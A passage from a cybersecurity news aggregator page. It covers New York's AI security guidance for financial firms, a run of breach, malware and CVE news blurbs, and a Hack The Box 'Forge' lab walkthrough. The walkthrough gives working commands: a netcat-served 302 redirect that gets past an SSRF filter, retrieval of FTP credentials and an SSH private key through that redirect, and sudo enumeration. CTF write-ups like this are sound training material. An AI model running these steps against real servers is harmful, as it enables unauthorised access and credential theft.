under the NYDFS Cybersecurity Regulation.Supply Chain Vulnerabilities: As financial organizations integrate AI into their operations, they also depend on a range of third-party vendors and partners. This interconnectedness introduces the risk of cyberattacks targeting vulnerabilities within the supply chain, including AI systems or software that may have been tampered with or compromised.Mitigating AI Cybersecurity Risks: Key Strategies for Financial InstitutionsThe NYDFS''s guidance offers practical advice on how institutions can address these AI-specific threats and integrate them into their existing cybersecurity programs. Here are key strategies from the guidance:Risk Assessments and AI-Specific Programs: Under the NYDFS Cybersecurity Regulation, financial entities are required to perform regular risk assessments. According to NYDFS, these assessments must include AI-related risks. This involves not only evaluating the internal use of AI systems but also assessing the AI systems provided by third-party vendors. Institutions should also ensure that their incident response plans, business continuity plans, and disaster recovery strategies are tailored to handle AI-driven risks.Third-Party Service Provider Management: Given the interconnected nature of modern financial systems, managing third-party relationships is more critical than ever. Financial institutions must ensure that their third-party vendors—whether they are providing AI-powered services or supporting infrastructure—adhere to the same stringent cybersecurity standards. Regular assessments and audits should be conducted to ensure third-party systems remain secure.Access Controls: The NYDFS guidelines emphasize the importance of robust access control mechanisms, ensuring that only authorized personnel can access sensitive AI-driven systems. This includes implementing multi-factor authentication (MFA), role-based access controls (RBAC), and segmentation of sensitive data to reduce the impact of a potential breach.Cybersecurity Training: AI’s potential use in social engineering attacks makes cybersecurity awareness training more critical than ever. Institutions should regularly educate their employees about the risks of AI-enhanced attacks and equip them with the knowledge to identify and respond to potential threats. Employees must be trained to recognize the signs of AI-powered phishing attempts and social engineering tactics.Continuous Monitoring and Data Management: Financial institutions should implement real-time monitoring tools to detect anomalies and suspicious activities within their AI systems. AI-driven cybersecurity monitoring tools can help track and flag unusual patterns that could signal an ongoing attack or breach. Additionally, effective data management practices should ensure that sensitive data is encrypted, segmented, and protected against unauthorized access.The Road Ahead: What''s Next for AI and Cybersecurity?The NYDFS''s AI cybersecurity guidance underscores the need for financial institutions to proactively incorporate AI considerations into their risk management activities. While the guidelines focus on regulated entities, the risks and strategies outlined are universally relevant to many organizations using AI. As AI technologies become more pervasive, institutions of all sizes must also integrate AI-specific risks into their broader cybersecurity and risk management frameworks.At HackerOne, we recognize that institutions need more than just traditional cybersecurity measures to address the growing risks posed by AI. That’s why we advocate for proactive, real-world testing through AI red-teaming. Red-teaming is a form of adversarial testing that can reveal flaws such as the potential for hackers to bypass AI security protections, as well as algorithmic safeguards against unsafe or harmful output. HackerOne’s red-teaming is driven by a community of ethical hackers whose creativity and expertise help organizations around the world stay safer and more secure. By uncovering AI vulnerabilities and algorithmic flaws early, institutions can take steps to mitigate them before they can be exploited by bad actors.As regulatory requirements around AI and cybersecurity come into focus, institutions should view the NYDFS guidelines not just as best practices but as business compliance imperatives. Securing AI systems is no longer optional; it’s essential for protecting both organizational assets and customer trust. Excerpt What does New York''s new AI Cybersecurity Guidance mean for financial institutions and other regulated companies? Main Image

by HackerOne

The more things change, the more they stay the same.

by ThreatDown

Researchers confirmed a new zero-day vulnerability is separate from a flaw originally disclosed in October. A notorious ransomware group linked itself to the attacks.

by Cybersecurity Dive

ITPro Today surveyed 350 DevOps professionals to gain insight into the current state of DevOps practices. The findings reveal how DevOps has reshaped organizations, the obstacles hindering its broader adoption, and the emerging technologies driving future DevOps initiatives.

by ITPro Today

The Security Service of Ukraine (SBU or SSU) has exposed a novel espionage campaign suspected to be orchestrated by Russia''s Federal Security Service (FSB) that involves recruiting Ukrainian minors for criminal activities under the guise of ""quest games."" Law enforcement officials said that it detained two FSB agent groups following a special operation in Kharkiv. These groups, per the agency,

by The Hacker News

In this continuation of our series on building a PowerShell tool to track lost disk space, we’ll focus on adding a feature to identify and display the 10 largest files on the hard disk.

by ITPro Today

New research by Keeper Security has revealed a concerning disconnect between parental trust and the actual cybersecurity practices happening in their children’s schools. While many parents believe schools are protecting their children’s sensitive information, only 14% of schools mandate security awareness training, and a mere 21% provide guidance on secure password management. This gap poses […] The post Schools Need Improved Cyber Education (Urgently) appeared first on IT Security Guru.

by IT Security Guru

Staffers at the Cybersecurity and Infrastructure Security Agency tell WIRED they fear the new administration will cut programs that keep the US safe—and “persecution.”

by WIRED Security News

Digital license plates sold by Reviver, already legal to buy in some states and drive with nationwide, can be hacked by their owners to evade traffic regulations or even law enforcement surveillance.

by WIRED Security News

New research from ISACA has revealed that the majority (87%) of IT professionals agree that there is a lack of gender diversity in the cybersecurity sector, yet less than half (41%) of businesses have programmes in place to hire more women. Whilst troublesome, these stats are not necessarily surprising. What’s more, 74% of businesses noted […] The post Only 41% of Businesses Have Programs in Place to Hire More Women in Tech appeared first on IT Security Guru.

by IT Security Guru

A thwarted attack demonstrates that threat actors using yet another delivery method for the malware, which already has been spread using phishing emails, malvertising, hijacking of instant messages, and SEO poisoning.

by Dark Reading

The Russian cyber-espionage group Gamaredon has developed two new Android spyware tools, marking their first known venture into mobile malware. The post The first mobile malware families linked to Russia’s Gamaredon appeared first on ZENDATA Cybersecurity.

by Zendata

The updated framework is designed to bolster the government’s partnership with private-sector organizations in the wake of an attack.

by Cybersecurity Dive

Methods to recover access to a hacked Telegram account

by Kaspersky

Kaspersky experts review dark market trends in 2024, such as popularity of cryptors, loaders and crypto drainers on the dark web, and discuss what to expect in 2025.

by Securelist

Telecom Namibia has fallen victim to a cyberattack, resulting in the leak of over 400,000 customer files. The Telecom Namibia cyberattack occurred on December 11, 2024, and the company is working closely with both local and international cybersecurity experts to determine the scope of the breach and to mitigate its impact.  Telecom Namibia''s CEO, Stanley Shanapinda, has assured the public that the company is dedicated to addressing the cyberattack responsibly. In a confidential statement, Shanapinda highlighted the company’s recent efforts to strengthen its cybersecurity systems.   Overview of the Telecom Namibia Cyberattack  As cyber incidents have become widespread and a common occurrence, we have recently identified and, in time, successfully contained a cyber reconnaissance mission, thanks to our advanced incident monitoring and detection systems and protocols,"" he stated. Shanapinda also promised that Telecom Namibia would release a detailed statement regarding the cyberattack soon.  The cyberattack on Telecom Namibia was allegedly carried out by a notorious ransomware group known as Hunters International. This ransomware-as-a-service operation was able to exfiltrate 626.3GB of data, including 492,633 files, before threatening to release the stolen information unless their ransom demands were met, reported the New Era newspaper.   Once the ransom deadline passed, hundreds of sensitive customer records, including personal identification details, addresses, and banking information, were leaked and began circulating on social media.  Concerns over the Cyberattack on Telecom Namibia The Communications Regulatory Authority of Namibia (Cran) has expressed grave concern over the Telecom Namibia cyberattack. Cran’s CEO, Emilia Nghikembua, emphasized the seriousness of cybersecurity in the country. Through the Namibia Cyber Security Incident Response Team (NAM-CSIRT), Cran promptly responded upon identifying the attack, and continues to support the affected operator in mitigating its impact,"" Nghikembua said.  Nghikembua also noted that while Namibia currently lacks a dedicated cybercrime and data protection law, the government is committed to ensuring compliance with international best practices in cybersecurity. She encouraged stakeholders to adopt globally recognized security measures such as encryption and regular security assessments to enhance the resilience of the country''s critical infrastructure. The protection of national critical infrastructure requires collective action, strategic planning, and a commitment to compliance with global standards,"" she added.  Conclusion   The Telecom Namibia cyberattack, with over 400,000 files leaked and sensitive customer data exposed, underscores the urgent need for stronger cybersecurity measures. The leaked information circulating on social media heightens the risk of targeted phishing attacks, where cybercriminals could use the stolen data to exploit individuals further. This is an ongoing story, and The Cyber Express will be closely monitoring the situation. We’ll update this post once we have more information of the attack or any new statements from the company.  

by The Cyber Express

Rhode Island is tackling with a major cybersecurity breach that has compromised the personal information of thousands of residents. The Rhode Island cyberattack targeted the state’s online system for delivering health and human services benefits, known as RIBridges, potentially exposing sensitive data such as names, addresses, dates of birth, Social Security numbers, and even banking information. Governor Daniel McKee and his administration are urging residents to take immediate action to protect their personal information as the threat of leaked data looms. Here’s what you need to know about the cyberattack, its implications, and the steps being taken to address the situation. The Rhode Island Cyberattack: What Happened? On December 5, 2024, Rhode Island’s vendor, Deloitte, informed state officials about a potential cyberattack on RIBridges system. At that time, it was unclear if sensitive information had been breached. Following an internal investigation and the implementation of additional security measures, Deloitte confirmed on December 10 that a breach had occurred. Hackers provided a screenshot of file folders from the system as proof, which likely contained personal data of Rhode Island residents. By December 13, malicious code was detected within the system, leading the state to take RIBridges offline to contain the threat. According to Deloitte, there is a high probability that cybercriminals have accessed files with personally identifiable information (PII). The attackers are demanding a ransom, but state officials have not disclosed the specifics of these demands. Who Is Affected? The data breach impacts individuals who have applied for or received benefits through the RIBridges system. Programs managed through this platform include: Medicaid Supplemental Nutrition Assistance Program (SNAP) Temporary Assistance for Needy Families (TANF) Child Care Assistance Program (CCAP) Rhode Island Works (RIW) Long-Term Services and Supports (LTSS) Health insurance purchased through HealthSource RI The state is still determining the full scope of the breach, but it’s clear that both current and former beneficiaries could be affected. What Information Was Compromised? The stolen data may include: Names Addresses Dates of birth Social Security numbers Banking information Deloitte is continuing its analysis to determine the exact extent of the breach. State Response and Measures Taken Governor McKee emphasized the urgency of addressing this breach during a media briefing on Friday, December 15. The state has taken the following actions: System Shutdown: RIBridges was taken offline on December 13 to mitigate the threat and begin remediation. Law Enforcement Involvement: Federal agencies, including law enforcement and the Rhode Island State Police, are assisting with the investigation. Dedicated Call Center: Rhode Islanders can contact a toll-free hotline, operated by Experian, for guidance on protecting their personal information. The call center is available Monday through Friday from 9 a.m. to 9 p.m. at 833-918-6603. Free Credit Monitoring: Impacted households will receive a letter by mail explaining how to access free credit monitoring services. What Residents Should Do Now The state advises Rhode Islanders to take proactive steps to safeguard their personal information: Monitor Financial Accounts Check bank accounts and credit card statements for any unauthorized activity. Contact your bank for guidance on securing your accounts. Freeze Your Credit Consider placing a credit freeze or fraud alert with the three major credit bureaus to prevent unauthorized use of your information. Credit Bureau Contact Information: Equifax: 1-800-349-9960 Experian: 1-888-397-3742 TransUnion: 1-888-909-8872 Update Your Passwords Change any reused or weak passwords to strong, unique ones. Use a password manager to securely store and manage your credentials. Stay Alert for Scams Be cautious of phishing emails or phone calls attempting to exploit this breach. Never provide personal information unless you are certain of the recipient’s identity. Stay Informed Visit the state’s dedicated website for updates on the situation. How Is the State Addressing the Breach? The state and Deloitte are working together to: Identify how the breach occurred. Remediate vulnerabilities in the system. Restore the RIBridges platform as quickly as possible. Law enforcement continues to investigate the cyberattack, but no further leads have been disclosed at this time. Key Takeaways for Residents While no instances of identity theft have been reported so far, residents should remain vigilant. Cybersecurity breaches of this magnitude can have long-term consequences, particularly when sensitive information like Social Security numbers and banking details are involved. Governor McKee and state officials have expressed their commitment to transparency and timely updates. However, the incident underlines the importance of strong cybersecurity measures, especially for systems handling sensitive data. What’s Next? The state continues to investigate the breach and implement measures to prevent future attacks. Deloitte, as the system vendor, will likely face scrutiny over its cybersecurity protocols and response time. For Rhode Islanders, the immediate focus should be on securing personal information and staying informed about developments in this case.

by The Cyber Express

A list of topics we covered in the week of December 9 to December 15 of 2024

by Malwarebytes Labs

The latest Sensor Intelligence Report from Cyble, dated December 4–10, 2024, sheds light on a troubling increase in cyber threats, including malware intrusions, phishing scams, and attacks targeting vulnerabilities in Internet of Things (IoT) devices.   This report, compiled from real-time data captured by Cyble’s extensive network of Honeypot sensors, offers critical insights into exploitation attempts, malware, financial fraud, and Common Vulnerabilities and Exposures (CVEs).  Overview of the Cyble Sensor Intelligence Report  Cyble’s cutting-edge Sensor Intelligence Report provides a comprehensive analysis of the most prevalent cyber threats over the past week. Among the key findings, there is a notable surge in exploitation attempts, malware outbreaks, and vulnerabilities within both IoT devices and widely-used software platforms.   Cyble’s Global Sensors Intelligence (CGSI) network played a crucial role in detecting several attack vectors during this period. These attacks primarily targeted high-profile vulnerabilities such as those found in the Mirai and Gafgyt malware variants, along with exploits affecting the Telerik UI and Cisco ASA platforms. One of the standout observations was the increased frequency of financial fraud attempts, which were often delivered through phishing campaigns designed to steal personal and financial data. These campaigns, many of which were disguised as legitimate software updates or system alerts, continue to present online risks to businesses and individuals alike.  Focus on IoT Vulnerabilities  Among the many attack vectors identified, IoT vulnerabilities emerged as a primary target for cybercriminals. The rapid proliferation of connected devices has created an expansive attack surface, leaving critical systems exposed. In this report, Cyble emphasizes the importance of securing IoT devices against exploitation. A variety of vulnerabilities were identified, many of which allowed attackers to remotely access devices and potentially control them. These vulnerabilities are particularly concerning, as they may compromise entire networks of interconnected systems.  Malware, Phishing, and CVE Exploits  The Sensor Intelligence Report also provides in-depth analysis on the rise of specific malware strains and exploitation attempts targeting software vulnerabilities. Below are key highlights:  Malware: AppLite Banker Trojan  One of the most interesting threats identified was the AppLite Banker Trojan, a malware designed to steal financial data. This malware is primarily distributed through phishing emails disguised as customer relationship management (CRM) applications. Once installed, it leverages Android’s Accessibility Services to overlay fake login screens on popular banking apps, tricking users into entering their credentials.  What makes AppLite particularly dangerous is its advanced evasion techniques. It manipulates APK file structures, making it difficult for static analysis tools to detect it. After gaining access to a device, the Trojan can exfiltrate sensitive financial data, execute commands remotely, and control the device through features like screen unlocking and simulating user interactions. With its multilingual capabilities, this malware is becoming a global threat, targeting users across various regions.  CVE Exploits: A Growing Concern  Cyble’s Sensor Intelligence Report also highlights the continued exploitation of numerous CVEs, with CVE-2020-11899 standing out as the most frequently attacked. This vulnerability, which affects the Treck TCP/IP stack, allows attackers to trigger an out-of-bounds read in IPv6 communications. During the reporting period, a staggering 25,736 attempts to exploit this vulnerability were detected. Other notable CVEs under attack include:  CVE-2019-0708: A remote code execution vulnerability in Remote Desktop Services that continues to be actively targeted.  CVE-2021-44228: The infamous Log4j vulnerability, which remains a major avenue for cybercriminal exploitation.  These CVEs, along with many others, have been exploited in increasingly sophisticated attacks, demonstrating the critical need for organizations to patch vulnerabilities in a timely manner.  Case Studies on Exploited Vulnerabilities  The report also examines several vulnerabilities in widely-used software systems. Key examples include:  PHP CGI Argument Injection Vulnerability (CVE-2024-4577): This critical vulnerability in PHP configurations allows attackers to execute arbitrary commands via specially crafted URL parameters. Organizations are advised to patch PHP configurations and limit access to prevent exploitation.  OSGeo GeoServer Remote Code Execution (CVE-2024-36401): Cyble identified a remote code execution flaw in older versions of GeoServer, which allows unauthenticated users to run arbitrary code. The report recommends updating GeoServer to versions 2.23.6, 2.24.4, or 2.25.2 to mitigate the risk.  Ruby SAML Improper Signature Verification (CVE-2024-45409): This vulnerability in the Ruby-SAML library could allow attackers to forge SAML responses and gain unauthorized access to systems. Updating to Ruby-SAML version 1.17.0 is recommended.  Cisco IOS XE Web UI Privilege Escalation (CVE-2023-20198, CVE-2023-20273): Exploitation of these vulnerabilities allows attackers to escalate privileges and gain root access to affected systems, with active attacks continuing.  Conclusion   To mitigate the growing cyber threats identified in Cyble’s Sensor Intelligence Report, organizations must adopt a proactive approach by regularly updating software and hardware to patch vulnerabilities, leveraging threat intelligence feeds to block malicious IPs, enforcing strong passwords and multi-factor authentication, and continuously monitoring for Indicators of Compromise (IoCs) such as suspicious IP addresses and file hashes. Regular vulnerability audits should also be conducted to identify and remediate misconfigurations.  

by The Cyber Express

by ComputerWeekly

For the latest discoveries in cyber research for the week of 16th December, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES The Romanian National Cybersecurity Directorate (DNSC) has disclosed a ransomware attack conducted by Lynx ransomware gang on the country’s energy provider Electrica Group, which provides services to more than 3.8M people across […] The post 16th December – Threat Intelligence Report appeared first on Check Point Research.

by Check Point Research

The Cybersecurity and Infrastructure Security Agency (CISA) and the Environmental Protection Agency (EPA) have jointly released a crucial fact sheet highlighting the cybersecurity risks posed by Internet-exposed Human Machine Interfaces (HMIs) in the Water and Wastewater Systems (WWS) sector. The fact sheet, titled Internet-Exposed HMIs Pose Cybersecurity Risks to Water and Wastewater Systems, offers practical guidance for WWS facilities to mitigate the risks associated with unsecured HMIs and protect their operations from malicious cyber activity.  HMIs are integral to the operation of supervisory control and data acquisition (SCADA) systems, which are commonly used in Water and Wastewater Systems (WWS) to monitor and control a wide array of infrastructure. These systems are often connected to programmable logic controllers (PLCs), which manage real-time operations. However, when HMIs are exposed to the internet without proper security measures, they become vulnerable to exploitation by cybercriminals and other threat actors.   The Dangers of Exposed Human Machine Interfaces in WWS   Human Machine Interfaces serve as the critical bridge between operational technology (OT) and system operators, allowing them to monitor and control various aspects of WWS operations. However, when HMIs are exposed to the internet, they can be accessed by unauthorized users, putting vital water and wastewater operations at risk.  According to the joint fact sheet, unauthorized access to exposed HMIs allows malicious actors to:  View sensitive information, including graphical user interfaces, distribution system maps, event logs, and security settings.  Make unauthorized modifications, potentially disrupting water and wastewater treatment processes, which can lead to severe operational impacts.  One distressing trend that has emerged in recent years is the ability of threat actors to easily identify and exploit internet-exposed HMIs with weak or no cybersecurity defenses. In 2024, pro-Russia hacktivists exploited vulnerabilities in exposed HMIs at multiple Water and Wastewater Systems facilities.  These attackers manipulated system settings to push water pumps and blower equipment beyond their safe operating limits, altered critical settings, deactivated alarm mechanisms, and locked out system operators by changing administrative passwords. The result was a forced reversion to manual operations, disrupting services.  Mitigation Strategies for Securing HMIs  In response to these growing concerns, CISA and EPA have outlined several mitigations that WWS organizations should implement to enhance the security of their Human Machine Interfaces and protect against cyber threats. These recommendations are vital to hardening remote access to HMIs and ensuring that only authorized personnel can interact with these systems.  Organizations should identify all HMIs and related systems that are accessible from the public internet. This allows for a comprehensive understanding of the vulnerabilities within the system.  If possible, disconnect any internet-facing HMIs from the public network. If disconnection is not feasible, it is essential to secure them with strong access controls, including complex usernames and passwords.  Multifactor authentication should be implemented for all remote access to HMIs and OT networks, adding an extra layer of security to the system.  Enabling a demilitarized zone (DMZ) or bastion host at the OT network boundary can isolate sensitive systems from the broader internet, making it harder for unauthorized actors to penetrate internal networks.  Keeping systems and software up to date with the latest security patches is essential for closing vulnerabilities that could be exploited by cybercriminals.  Only allow authorized IP addresses to access the HMIs, reducing the risk of unauthorized remote login attempts.  It is important to log and review all remote logins to HMIs, paying attention to any failed login attempts or unusual login times, which could indicate suspicious activity.  Conclusion  CISA and the EPA offer valuable resources to help Water and Wastewater Systems (WWS) strengthen cybersecurity, including free vulnerability scanning and guidance like CISA’s Top Cyber Actions for Securing Water Systems and the EPA’s cybersecurity recommendations.   Tools like CISA’s Stuff Off Search help identify internet-exposed assets. As cyber threats increase, WWS must adopt strong security measures, such as access controls, multifactor authentication, and regular updates, to protect critical infrastructure and ensure the safety of water and wastewater services. 

by The Cyber Express

Amnesty said it found NoviSpy, an Android spyware linked to Serbian intelligence, on the phones of several members of Serbian civil society following police stops. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

A fraudulent Google ad meant to phish employees for their login credentials redirects them to a fake browser update page instead.

by Malwarebytes Labs

by CrowdStrike

by CrowdStrike

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Dell Avamar. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.2. The following CVEs are assigned: CVE-2024-47484.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Dell Avamar. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.1. The following CVEs are assigned: CVE-2024-47977.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Dell Avamar. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.1. The following CVEs are assigned: CVE-2024-52538.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Dell Avamar. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.1. The following CVEs are assigned: CVE-2024-47977.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Dell Avamar. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.1. The following CVEs are assigned: CVE-2024-47977.

by Zero Day Initiative Advisories

The security system that underlies the internet makes use of a curious fact: You can broadcast part of your encryption to make your information much more secure.

by WIRED Security News

State officials said hundreds of thousands of Rhode Island residents could be affected by a cyberattack on the state’s online portal for social services, with a “high probability” that personally identifiable information was breached. According to an update from Governor Dan McKee’s office, the attack targeted RIBridges, which Rhode Island residents use to apply for and […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Germany''s Federal Office of Information Security (BSI) has announced that it has disrupted a malware operation called BADBOX that came preloaded on at least 30,000 internet-connected devices sold across the country. In a statement published earlier this week, authorities said they severed the communications between the devices and their command-and-control (C2) servers by sinkholing the domains

by The Hacker News

Thai government officials have emerged as the target of a new campaign that leverages a technique called DLL side-loading to deliver a previously undocumented backdoor dubbed Yokai. ""The target of the threat actors were Thailand officials based on the nature of the lures,"" Nikhil Hegde, senior engineer for Netskope''s Security Efficacy team, told The Hacker News. ""The Yokai backdoor itself is not

by The Hacker News

Bitdefender bundles antivirus and anti-malware with other digital privacy tools to keep you safer. Here''s how it works.

by ZDNET Security

Plus: The US indicts North Koreans in fake IT worker scheme, file-sharing firm Cleo warns customers to patch a vulnerability amid live attacks, and more.

by WIRED Security News

As digital nomadism gains traction, businesses must adapt by leveraging web intelligence to meet the evolving needs of remote workers.

by ITPro Today

A now-removed GitHub repository that advertised a WordPress tool to publish posts to the online content management system (CMS) is estimated to have enabled the exfiltration of over 390,000 credentials. The malicious activity is part of a broader attack campaign undertaken by a threat actor, dubbed MUT-1244 (where MUT refers to ""mysterious unattributed threat"") by Datadog Security Labs, that

by The Hacker News

Analysis of packer-as-a-service (PaaS) HeartCrypt reveals its use in over 2k malicious payloads across 45 malware families since its early 2024 appearance. The post Crypted Hearts: Exposing the HeartCrypt Packer-as-a-Service Operation appeared first on Unit 42.

by Palo Alto Networks - Unit42

by Dark Reading

by Dark Reading

A security flaw has been disclosed in OpenWrt''s Attended Sysupgrade (ASU) feature that, if successfully exploited, could have been abused to distribute malicious firmware packages. The vulnerability, tracked as CVE-2024-54143, carries a CVSS score of 9.3 out of a maximum of 10, indicating critical severity. Flatt Security researcher RyotaK has been credited with discovering and reporting the

by The Hacker News

Defenders running the Cleo managed file transfer are urged to be on the lookout for the Cleopatra backdoor and other indicators of an ongoing ransomware campaign, as patching details remain foggy, and no CVE has been issued.

by Dark Reading

Businesses deploying large language models and other GenAI systems have a growing collection of open source tools for testing AI security.

by Dark Reading

A new side-channel attack method is a computationally practical way to infer the structure of a convolutional neural network — meaning that cyberattackers or rival companies can plagiarize AI models and take their data for themselves.

by Dark Reading

The U.S. Department of Justice (DoJ) has indicted 14 nationals belonging to the Democratic People''s Republic of Korea (DPRK or North Korea) for their alleged involvement in a long-running conspiracy to violate sanctions and commit wire fraud, money laundering, and identity theft by illegally seeking employment in U.S. companies and non-profit organizations. ""The conspirators, who worked for

by The Hacker News

Open to players of all skill levels, the "Snow-mageddon" cybersecurity competition takes place in the world of Santa, elves, and Christmas mayhem.

by Dark Reading

Optum''s AI chatbot was found exposed online at a time when the healthcare giant faces scrutiny for its use of AI to allegedly deny patient claims. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

In an effort to continue the positive trend of the healthcare industry not experiencing the highest number of breaches in Q1 of 2024, the US Department of Health and Human Services (HHS) launched a new initiative last spring. Learn more about the new federal program in this blog.

by Barracuda

A flurry of drone sightings across New Jersey and New York has sparked national intrigue and US government responses. But experts are pouring cold water on America’s hottest new conspiracy theory.

by WIRED Security News

Infostealer capabilities and how to protect your organization against this threat.

by Kaspersky

IoT security assessments expose diverse technologies, use cases, and protocols. While wireless components like WiFi and Bluetooth enhance functionality and enable features like OTA updates, they also increase the attack surface. This blog explores the challenges of assessing non-wireless IoT devices and considers the potential of adding wireless capabilities for comprehensive security testing. The post Breaking the Air Gap Through Hardware Implants appeared first on Praetorian.

by Praetorian

Task 1: How many open TCP ports are listening on Forge? └──╼ [★]$ nmap --min-rate 10000 -A -p- forge.htb Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-13 04:03 CST Nmap scan report for forge.htb (10.129.53.139) Host is up (0.28s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp filtered ftp 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA) | 256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA) |_ 256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Gallery Answer: 2 Task 2: What TCP port is reported as filtered by nmap? From previous task we can see that port 21 is filtered. Answer: 21 Task 3: What is the full domain name of the subdomain of the default domain used by the website? For this task we need to fuzz or enumerate and find subdomains. We will be using the following command to do that. Let’s filter out all responses like 404,403, and 302 we get our answer. └──╼ [★]$ wfuzz -u http://forge.htb -H ""Host: FUZZ.forge.htb"" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hc 404,403,302 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz''s documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://forge.htb/ Total requests: 19966 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000024: 200 1 L 4 W 27 Ch ""admin"" Answer: admin.forge.htb Make sure to add this subdomain to /etc/hosts file. Task 4: In addition to HTTP, what other protocol is supported in the URLs provided to the “upload from url” form? This one should be obvious, we check the web page and in answer it says 5 stars which is (*****) . Answer: https Task 5: What is the text in the <center><h1> tags on the admin site? Hint - Trying to access admin.forge.htb directly or from the URL field is blocked. What happens if we have the URL contact us and then we return an HTTP 302? We see that the endpoint admin.forge.htb is not at all accessible and there is nothing we can do. But remember we have an option to upload as URL on forge.htb let’s utilize this functionality and see if we can do something. We tried redirecting to admin.forge.htb, changed it’s case to bypass filters like AdMiN.fOrGe.hTb but nothing works. Let take a pause, and touch some grass and let’s get back to hack. Now we are stuck, so we take an look at hint and ponder what we can do. Hmm we should redirect the request made to 302. We can do that on netcat. Let’s make an request for the endpoint we are trying to bypass that is admin.forge.htb HTTP/1.1 302 Found Location: http://admin.forge.htb/ Save this file as http.req and let’s start our listener. └──╼ [★]$ sudo nc -nlvp 8000 < http.req First click the option to upload from url Then enter our localhost that we are hosting on netcat Enter Submit button you should get an URL. Once you get request on your netcat listener hit ctrl + c to stop the process, then you should get the URL for the file you have uplaoded. Visit the URL via curl to get our answer for this task. Answer: Welcome Admins! Task 6: What is the password for the user user on the FTP server? Let’s ponder over the previous task, we got admin dashboard but it also has an /announcements. So let’s iterate the previous task this time to get /announcements section on the admin subdomain. STEP 1: Create an http.request to redirect to the desired target. HTTP/1.1 302 Found Location: http://admin.forge.htb/announcements STEP 2: Start netcat listener. sudo nc -nlvp 8000 < http.req STEP 3: Visit the endpoint, and on upload as url option enter your localhost IP address with right port number to perform RFI attack (Remote File Inclusion). First click the option to upload from url Then enter our localhost that we are hosting on netcat Enter Submit button you should get an URL. Once you get request on your netcat listener hit ctrl + c to stop the process, then you should get the URL for the file you have uplaoded. Visit the URL via curl to get our answer for this task. Now let’s curl the request and see what we got. └──╼ [★]$ curl http://forge.htb/uploads/uhIkIHlvObStiy3Lujrv <!DOCTYPE html> <html> <head> <title>Announcements</title> </head> <body> <link rel=""stylesheet"" type=""text/css"" href=""/static/css/main.css""> <link rel=""stylesheet"" type=""text/css"" href=""/static/css/announcements.css""> <header> <nav> <h1 class=""""><a href=""/"">Portal home</a></h1> <h1 class=""align-right margin-right""><a href=""/announcements"">Announcements</a></h1> <h1 class=""align-right""><a href=""/upload"">Upload image</a></h1> </nav> </header> <br><br><br> <ul> <li>An internal ftp server has been setup with credentials as user:heightofsecurity123!</li> <li>The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.</li> <li>The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=<url>.</li> </ul> </body> </html> Answer: heightofsecurity123! Task 7: What is the HTTP GET parameter on admin.forge.htb/upload for passing a URL that handles the FTP protocol? Let’s carefully look at /announcements from admin.forge.htb, we clearly see what method can be used, since in the /announcements they mentioned about something adding to URL which is nothing but ?u=<url&gt [which means if something is added in URL it’s mostly and GET request]. Answer: u Task 8: Submit the flag located in the user user’s home directory. Like in previous step let’s re do all the steps but we will be changing the http.req file. HTTP/1.1 302 Found Location: http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/ We re do the 4 steps, start listener, make an request to our netcat, stop netcat, and curl the file upload url and we get the following details. └──╼ [★]$ curl http://forge.htb/uploads/xvyJ4ZoiP9jpJYAlzUJS drwxr-xr-x 3 1000 1000 4096 Aug 04 2021 snap -rw-r----- 1 0 1000 33 Dec 13 15:18 user.txt So let’s add user.txt to the location at end and our new http.req must look something like this. HTTP/1.1 302 Found Location: http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/ Now if we redo the steps from previous tasks we should get user.txt. To get into machine let’s try getting ssh, so that we can change the http.req to the following and redo the steps. HTTP/1.1 302 Found Location: http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/.ssh/id_rsa An little research over how to perform ftp request using http request won’t hurt I guess. Now since we have id_rsa file let’s change it’s executable permissions and since we have found flag inside user.txt let’s ssh into the account of user. chmod 600 id_rsa ssh user@10.129.187.4 -i id_rsa Task 9: What is the full path to the script that the user user can run as root without a password? We will be using the classic sudo -l command to figure answer for this task. user@forge:~$ sudo -l Matching Defaults entries for user on forge: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User user may run the following commands on forge: (ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/remote-manage.py Answer: /opt/remote-manage.py Task 10: What is the imported Python module that, if invoked, 